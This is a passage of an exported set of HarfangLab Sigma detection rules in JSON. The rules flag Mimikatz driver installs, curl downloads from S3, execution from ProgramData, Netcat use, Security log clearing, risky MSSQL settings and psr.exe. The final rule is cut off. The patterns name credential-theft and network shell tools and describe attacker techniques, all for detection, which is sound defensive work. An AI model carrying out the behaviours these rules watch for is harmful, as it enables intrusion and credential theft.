"content": "title: Mimikatz Service Installed\nid: b4d8fde4-7113-455b-9cf6-22c00f2d8384\ndescription: |\n Detects the installation of the mimikatz service.\n Mimikatz is a popular offensive security tool used for credential acquisition and lateral movement on an Active Directory endpoint.\n It is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\nreferences:\n - https://posts.specterops.io/mimidrv-in-depth-4d273d19e148\n - https://attack.mitre.org/techniques/T1569/002\n - https://attack.mitre.org/software/S0002/\ndate: 2021/05/06\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - attack.s0002\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n service: system\ndetection:\n selection_event_id:\n EventID: 7045\n\n selection_service_name:\n - ServiceName|contains: 'mimikatz driver' # mimikatz driver (mimidrv)\n - ServiceFileName|contains: 'mimidrv.sys'\n\n condition: all of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b4d8fde4-7113-455b-9cf6-22c00f2d8384",
"rule_name": "Mimikatz Service Installed",
"rule_description": "Detects the installation of the mimikatz service.\nMimikatz is a popular offensive security tool used for credential acquisition and lateral movement on an Active Directory endpoint.\nIt is recommended to investigate the activity surrounding this action to determine its maliciousness and to verify that this is not part of an active security audit in your organization.\n",
"rule_creation_date": "2021-05-06",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b5111369-ac70-4bc7-8b08-2b742d2226a8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296470Z",
"creation_date": "2026-03-23T11:45:35.296472Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296476Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/threat-intelligence/clipping-silver-sparrows-wings/",
"https://attack.mitre.org/techniques/T1102/"
],
"name": "t1102_curl_aws_bucket.yml",
"content": "title: Data Retrieved from AWS Bucket via curl\nid: b5111369-ac70-4bc7-8b08-2b742d2226a8\ndescription: |\n Detects a curl command-line containing an AWS bucket URL.\n Adversaries can use AWS buckets to store payloads, as traffic to AWS instances is usually allowed and common in corporate environments.\n It is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\nreferences:\n - https://redcanary.com/blog/threat-intelligence/clipping-silver-sparrows-wings/\n - https://attack.mitre.org/techniques/T1102/\ndate: 2024/06/12\nmodified: 2026/02/19\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102\n - attack.t1105\n - attack.t1071.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.FileDownload\n - classification.macOS.Behavior.CommandAndControl\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/curl'\n CommandLine|contains: 's3.amazonaws.com'\n\n exclusion_ancestors:\n Ancestors|contains: '|/Applications/Unity Hub.app/Contents/MacOS/Unity Hub|'\n\n exclusion_homebrew:\n ParentCommandLine|startswith: '/opt/homebrew/Library/Homebrew/vendor/portable-ruby/current/bin/ruby -W1 --disable=gems,rubyopt /opt/homebrew/Library/Homebrew/brew.rb '\n\n exclusion_pod:\n ParentCommandLine|endswith:\n - '/bin/pod update'\n - '/bin/pod install'\n\n exclusion_jamf:\n ProcessAncestors|contains: '|/usr/local/jamf/bin/jamf'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b5111369-ac70-4bc7-8b08-2b742d2226a8",
"rule_name": "Data Retrieved from AWS Bucket via curl",
"rule_description": "Detects a curl command-line containing an AWS bucket URL.\nAdversaries can use AWS buckets to store payloads, as traffic to AWS instances is usually allowed and common in corporate environments.\nIt is recommended to investigate files that were downloaded, and to analyze the process that executed the curl command to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-06-12",
"rule_modified_date": "2026-02-19",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102",
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b54e5056-40b9-4eea-aab9-6dc111b8afb2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624489Z",
"creation_date": "2026-03-23T11:45:34.624491Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624495Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/SecurityAura/status/1737092798728278498",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_execution_from_programdata.yml",
"content": "title: Binary Executed from ProgramData Folder\nid: b54e5056-40b9-4eea-aab9-6dc111b8afb2\ndescription: |\n Detects a suspicious execution from the root of the ProgramData folder.\n This folder is an uncommon directory for binaries to execute from and is often abused by attackers.\n It is recommended to analyze the executed binary and look malicious content or behavior.\nreferences:\n - https://twitter.com/SecurityAura/status/1737092798728278498\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2024/01/26\nmodified: 2025/12/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|startswith: '?:\\ProgramData\\'\n\n filter_programdata:\n Image: '?:\\ProgramData\\\\*\\\\*'\n\n exclusion_uninstall:\n CommandLine:\n - '?:\\ProgramData\\\\*_Uninstall.exe */NO_UNINSTALL_FEEDBACK=true _\\?=?:\\Program Files\\\\*\\bin'\n - '?:\\ProgramData\\\\*_Uninstall.exe */NO_UNINSTALL_FEEDBACK=true _\\?=?:\\Program Files (x86)\\\\*\\bin'\n ParentCommandLine:\n - '?:\\Users\\\\*\\Downloads\\\\* /UAC:* /NCRC'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\* /UAC:* /NCRC'\n\n exclusion_forensit:\n OriginalFileName: 'UserProfileMigrationService.exe'\n Description: 'ForensiT User Profile Migration Service'\n Company:\n - 'ForensiT Software Limited'\n - 'ForensiT Limited'\n\n exclusion_tsplus:\n Image:\n - '?:\\ProgramData\\alternateshell.exe'\n - '?:\\ProgramData\\svcr.exe'\n - '?:\\ProgramData\\logonsession.exe'\n Signed: 'true'\n Signature:\n - 'JWTS'\n - 'JWTS SASU'\n - 'Remote Access World SAS'\n - 'TSplus SAS'\n\n exclusion_vmsuite:\n # C:\\Program Files\\Thermo Scientific\\VisionMate Suite\\VMSuite.exe\n Image: '?:\\ProgramData\\DPMon32_v2.exe'\n Signed: 'true'\n Signature: 'Microcosm Ltd'\n\n exclusion_varian:\n # C:\\ProgramData\\VDT.exe\n 
OriginalFileName: 'VarianDeploymentTool.exe'\n Description: 'Varian Deployment Tool'\n Company: 'Varian Medical Systems, Inc.'\n\n exclusion_bluestack:\n Image: '?:\\ProgramData\\BlueStacksServicesSetup.exe'\n Signed: 'true'\n Signature: 'Now.gg, INC'\n\n exclusion_intellijidea:\n Image: '?:\\ProgramData\\IntelliJIdea????.?_???.*.??_Uninstall.exe'\n ParentImage|endswith: '\\ideaIU-????.?.?.exe'\n\n exclusion_dpmon:\n ProcessName: 'DPmon64_v3.exe'\n Signed: 'true'\n # company doing security software\n Signature: 'Microcosm Ltd'\n\n exclusion_abcdeploy:\n - ProcessImage: '?:\\ProgramData\\Win-update.exe'\n Signed: 'true'\n Signature: 'ABC-Deploy'\n - ProcessImage: '?:\\ProgramData\\Win-update.exe'\n ProcessProduct: 'ABC-Deploy'\n ProcessOriginalFileName: 'ABC-Update.exe'\n\n exclusion_beyondtrust:\n - ProcessImage: '?:\\ProgramData\\btsccoi-????????????????????????????????.exe'\n Signed: 'true'\n Signature: 'BeyondTrust Corporation'\n - ProcessImage: '?:\\ProgramData\\btsccoi-????????????????????????????????.exe'\n Ancestors|contains: '\\AppData\\Local\\BeyondTrust\\sra-scc\\\\*\\sra-scc.exe|'\n\n exclusion_faronics:\n ProcessImage: '?:\\ProgramData\\FWAInstallMonitor.exe'\n Signed: 'true'\n Signature: 'Faronics Corporation'\n\n exclusion_jetbrains:\n - ProcessImage: '?:\\ProgramData\\PyCharm*_Uninstall.exe'\n Signed: 'true'\n Signature: 'JetBrains s.r.o.'\n - ProcessImage:\n - '?:\\ProgramData\\PyCharm*_Uninstall.exe'\n - '?:\\ProgramData\\IntelliJIdea*_Uninstall.exe'\n - '?:\\ProgramData\\Rider*_Uninstall.exe'\n ProcessCommandLine:\n - '?:\\ProgramData\\PyCharm*_Uninstall.exe /NO_UNINSTALL_FEEDBACK=true _?=?:\\Program Files\\JetBrains\\PyCharm *\\bin'\n - '?:\\ProgramData\\IntelliJIdea*_Uninstall.exe /NO_UNINSTALL_FEEDBACK=true _?=?:\\\\*\\IntelliJ IDEA *\\bin'\n - '?:\\ProgramData\\Rider*_Uninstall.exe /NO_UNINSTALL_FEEDBACK=true _?=?:\\\\*\\JetBrains Rider *\\bin'\n\n exclusion_microcosm:\n ProcessImage: '?:\\ProgramData\\DPMon32_v?.exe'\n ProcessParentImage: 
'?:\\Program Files\\Thermo Scientific\\VisionMate Suite\\VMSuite.exe'\n\n # Behringer X-USB\n exclusion_behringer:\n ProcessImage:\n - '?:\\ProgramData\\CNE???.tmp'\n - '?:\\ProgramData\\CNE????.tmp'\n ProcessCommandLine: '?:\\ProgramData\\CNE*.tmp openh ??:\\Program Files\\BEHRINGER\\X-*_Audio_Driver\\W10_x64\\X*AudioCplApp.exe? -hide'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b54e5056-40b9-4eea-aab9-6dc111b8afb2",
"rule_name": "Binary Executed from ProgramData Folder",
"rule_description": "Detects a suspicious execution from the root of the ProgramData folder.\nThis folder is an uncommon directory for binaries to execute from and is often abused by attackers.\nIt is recommended to analyze the executed binary and look for malicious content or behavior.\n",
"rule_creation_date": "2024-01-26",
"rule_modified_date": "2025-12-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b594e09f-86e5-4b70-a942-e1e2bb362f05",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294386Z",
"creation_date": "2026-03-23T11:45:35.294390Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294395Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1046/",
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/techniques/T1095/",
"https://attack.mitre.org/techniques/T1021/"
],
"name": "t1049_netcat_linux.yml",
"content": "title: Netcat Execution (Linux)\nid: b594e09f-86e5-4b70-a942-e1e2bb362f05\ndescription: |\n Detects the execution of Netcat, a networking utility that reads and writes data across network connections.\n Netcat can be used by attackers to perform malicious activities such as reconnaissance, lateral movement, reverse shell, etc.\n It is recommended to analyze the process responsible for the execution of netcat as well as the to analyze the command-line arguments to determine whether its usage is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1046/\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/techniques/T1095/\n - https://attack.mitre.org/techniques/T1021/\ndate: 2023/01/03\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1046\n - attack.t1049\n - attack.command_and_control\n - attack.t1095\n - attack.lateral_movement\n - attack.t1021\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.CommandAndControl\n - classification.Linux.Behavior.Lateralization\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/netcat'\n - '/ncat'\n - '/nc'\n - '/nc.openbsd'\n - '/nc.traditional'\n ParentImage|contains: '?'\n\n exclusion_help:\n CommandLine|endswith:\n - ' -h'\n - ' -help'\n - ' --help'\n\n exclusion_localhost:\n CommandLine|contains:\n - ' localhost '\n - ' 127.0.0.1 '\n\n exclusion_commandline:\n ParentCommandLine: '/usr/bin/bash -c FC=$FMX; while true; do /usr/bin/nc -z * && FC=-1 ; ((FC++)) ; [ $FC -ge $FMX ] && exit 2 ; sleep $SLEEP ; done & '\n\n exclusion_zimbra:\n ParentCommandLine:\n - '/bin/bash /opt/zimbra/bin/zmconfigdct *'\n - '/bin/bash /opt/zimbra/bin/zmconfigdctl *'\n\n exclusion_apigee:\n # Grand parent can be missing\n # GrandparentCommandLine: '/bin/bash 
/opt/apigee/apigee-service*/bin/apigee-service *'\n ParentCommandLine: 'timeout 1 nc -w0 -u localhost 8090'\n\n exclusion_containerd:\n - ParentImage:\n - '/usr/bin/containerd-shim'\n - '/usr/bin/containerd-shim-runc-v2'\n - '/usr/local/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/podman|'\n\n exclusion_dockerselenium:\n ParentCommandLine:\n - 'bash /usr/bin/wait-vnc.sh'\n - '/usr/bin/env bash /usr/bin/wait-vnc.sh'\n\n exclusion_tor:\n ParentCommandLine|contains: '; echo signal newnym; echo quit) | nc'\n\n # https://labs.maarch.org/maarch/MaarchCourrier\n # src/app/contentManagement/controllers/DocumentEditorController.php\n exclusion_maarch:\n ParentCommandLine: 'sh -c nc -vz -w 5 * 2>&1'\n CommandLine: 'nc -vz -w 5 *'\n\n # https://gallery.munin-monitoring.org/plugins/munin/squeezebox_/\n exclusion_squeezebox:\n - ParentCommandLine: '/bin/bash /etc/munin/plugins/squeezebox_*'\n - GrandparentCommandLine:\n - '/usr/sbin/munin-node [127.0.0.1]'\n - '/usr/sbin/munin-node [::ffff:127.0.0.1]'\n\n exclusion_munin:\n ParentCommandLine: '/usr/bin/perl -wT /usr/sbin/munin-node'\n\n exclusion_consul:\n ParentImage: '/usr/bin/consul'\n\n exclusion_stibo:\n ParentImage: '/opt/stibo/step/resources/jdk/*/bin/java'\n\n exclusion_nxagentd:\n - Image: '/usr/bin/nxagentd'\n - ParentImage: '/usr/bin/nxagentd'\n - GrandparentImage: '/usr/bin/nxagentd'\n\n exclusion_nagios:\n - ParentCommandLine|startswith:\n - '/bin/bash /usr/lib/nagios/plugins/'\n - '/bin/bash /usr/lib64/nagios/plugins/'\n - '/bin/bash /opt/nagiosagent/current/nagios_plugins/'\n - '/opt/nagiosagent/current/perl/bin/perl -w /opt/nagiosagent/current/bin/nagiosAgent'\n - GrandparentCommandLine|startswith:\n - '/bin/bash /usr/lib/nagios/plugins/'\n - '/bin/bash /usr/lib64/nagios/plugins/'\n\n exclusion_grafity:\n - ParentCommandLine|startswith: '/bin/sh -c 
/home/mvfadm/./MvfES2GrafityFormat.py'\n\n exclusion_kafka:\n - ParentCommandLine|startswith: '/usr/bin/ksh /opt/operating/bin/OperateKafkaAll'\n - CommandLine: 'nc -z kafka 9092'\n\n exclusion_kitproxy:\n CommandLine|contains: '/bin/nc kit-proxy 1234'\n\n exclusion_haproxy:\n - CommandLine: 'nc -U /var/lib/haproxy/stats'\n - ParentCommandLine|startswith: 'sh -c echo \"show stat\" | nc -U /var/lib/haproxy/stats'\n\n exclusion_healthcheck:\n # /bin/bash /healthcheck.sh\n # bash /healthcheck.sh\n ParentCommandLine|endswith: '/healthcheck.sh'\n\n exclusion_molis:\n ParentCommandLine|startswith: '/bin/bash /usr/molis/molis*/bin/ll_send2server'\n\n exclusion_vectra:\n ProcessGrandparentCommandLine: '/bin/bash /usr/sbin/vsensor-health-check.sh'\n\n exclusion_cron:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b594e09f-86e5-4b70-a942-e1e2bb362f05",
"rule_name": "Netcat Execution (Linux)",
"rule_description": "Detects the execution of Netcat, a networking utility that reads and writes data across network connections.\nNetcat can be used by attackers to perform malicious activities such as reconnaissance, lateral movement, reverse shell, etc.\nIt is recommended to analyze the process responsible for the execution of netcat as well as to analyze the command-line arguments to determine whether its usage is legitimate.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.discovery",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021",
"attack.t1046",
"attack.t1049",
"attack.t1095"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b5bd4ea0-bd89-49d6-9867-4f1b6a100c82",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626692Z",
"creation_date": "2026-03-23T11:45:34.626694Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626699Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/001/"
],
"name": "t1070_001_clear_windows_security_log.yml",
"content": "title: Windows Security Log Cleared\nid: b5bd4ea0-bd89-49d6-9867-4f1b6a100c82\ndescription: |\n Detects the Windows Security audit log being cleared.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n Windows Event Logs are a record of a computer's alerts and notifications.\n It is recommended to check for other malicious behavior on the host with the help of the machine's timeline.\nreferences:\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2021/04/27\nmodified: 2026/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 1102\n Source: 'Microsoft-Windows-Eventlog'\n ProcessImage|contains: '?'\n\n exclusion_image:\n - ProcessImage:\n - '?:\\Windows\\System32\\Sysprep\\sysprep.exe'\n - '?:\\Windows\\System32\\mmc.exe'\n - ProcessParentImage:\n - '?:\\Program Files (x86)\\Citrix\\Workspace Environment Management Agent\\Citrix.Wem.Agent.Service.exe'\n - '*\\CitrixOptimizer\\CitrixOptimizerTool.exe'\n - '?:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe'\n\n exclusion_commandline:\n ProcessGrandparentCommandLine|contains: '?:\\Program Files (x86)\\Base Image Script Framework (BIS-F)\\'\n\n exclusion_ccleaner:\n ProcessDescription: 'CCleaner Service'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'PIRIFORM SOFTWARE LIMITED'\n - 'Gen Digital Inc.'\n\n exclusion_ccleaner_nosign:\n ProcessDescription: 'CCleaner Service'\n ProcessCompany:\n - 'Piriform Software Ltd'\n - 'Gen Digital Inc.'\n ProcessProduct: 'CCleaner'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b5bd4ea0-bd89-49d6-9867-4f1b6a100c82",
"rule_name": "Windows Security Log Cleared",
"rule_description": "Detects the Windows Security audit log being cleared.\nAdversaries may clear Windows Event Logs to hide the activity of an intrusion.\nWindows Event Logs are a record of a computer's alerts and notifications.\nIt is recommended to check for other malicious behavior on the host with the help of the machine's timeline.\n",
"rule_creation_date": "2021-04-27",
"rule_modified_date": "2026-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b5d9a8b3-cbd7-4488-8875-db3142c7cadc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092226Z",
"creation_date": "2026-03-23T11:45:34.092228Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092233Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16",
"https://learn.microsoft.com/fr-fr/sql/database-engine/configure-windows/clr-enabled-server-configuration-option?view=sql-server-ver16",
"https://book.shentoushi.top/Databases/Mssql.html",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1059/003/",
"https://attack.mitre.org/techniques/T1505/001/"
],
"name": "t1190_mssql_dangerous_configuration.yml",
"content": "title: Dangerous MSSQL Functionality Enabled\nid: b5d9a8b3-cbd7-4488-8875-db3142c7cadc\ndescription: |\n Detects the activation of dangerous MSSQL functionalities or deactivation of security features that could lead to code execution.\n Attackers may enable functionalities or disable security features in order to gain code execution on a machine hosting a compromised database engine.\n It is recommended to check if this behavior is expected and check for malicious activities stemming from the associated sqlservr.exe process.\nreferences:\n - https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver16\n - https://learn.microsoft.com/fr-fr/sql/database-engine/configure-windows/clr-enabled-server-configuration-option?view=sql-server-ver16\n - https://book.shentoushi.top/Databases/Mssql.html\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1059/003/\n - https://attack.mitre.org/techniques/T1505/001/\ndate: 2024/02/05\nmodified: 2025/07/31\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.execution\n - attack.t1059.003\n - attack.persistence\n - attack.t1505.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n service: application\ndetection:\n selection_event:\n Source: 'MSSQLSERVER'\n EventID: 15457\n\n selection_feature_enabled:\n event_data.param0: # parameter name\n # - 'xp_cmdshell' # cmd execution - too much false positive, handled by another rule\n - 'clr enabled' # .net assembly loading\n - 'Ole Automation Procedures' # OLE Script execution\n - 'external scripts enabled' # Python or R script execution\n # - 'Ad Hoc Distributed Queries' # Run unsafe Visual Basic for Application functions\n event_data.param2: 1 # new value\n\n selection_feature_disabled:\n event_data.param0: 'clr strict security' # allows for unsigned .net assembly 
loading\n event_data.param2: 0 # new value\n\n condition: selection_event and 1 of selection_feature_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b5d9a8b3-cbd7-4488-8875-db3142c7cadc",
"rule_name": "Dangerous MSSQL Functionality Enabled",
"rule_description": "Detects the activation of dangerous MSSQL functionalities or deactivation of security features that could lead to code execution.\nAttackers may enable functionalities or disable security features in order to gain code execution on a machine hosting a compromised database engine.\nIt is recommended to check if this behavior is expected and check for malicious activities stemming from the associated sqlservr.exe process.\n",
"rule_creation_date": "2024-02-05",
"rule_modified_date": "2025-07-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.003",
"attack.t1190",
"attack.t1505.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b607e37d-aaf6-49a2-8a8c-e021f3ccfd3f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611363Z",
"creation_date": "2026-03-23T11:45:34.611366Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611374Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Psr/",
"https://attack.mitre.org/techniques/T1113/"
],
"name": "t1113_suspicious_process_psr.yml",
"content": "title: Execution of psr.exe\nid: b607e37d-aaf6-49a2-8a8c-e021f3ccfd3f\ndescription: |\n Detects the execution of the legitimate psr.exe Windows binary, which is the built-in Problem Steps Recorder used to record user actions together with screen captures.\n Attackers can abuse this tool to perform unauthorized screen captures, potentially gathering sensitive information about the victim's desktop.\n A suspicious usage example includes recording a user's screen without creating a graphical user interface (GUI).\n It is recommended to investigate such executions, review the permissions of the user account executing psr.exe, and ensure that screen capture activities are legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Psr/\n - https://attack.mitre.org/techniques/T1113/\ndate: 2022/04/11\nmodified: 2025/04/16\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1113\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Psr\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: 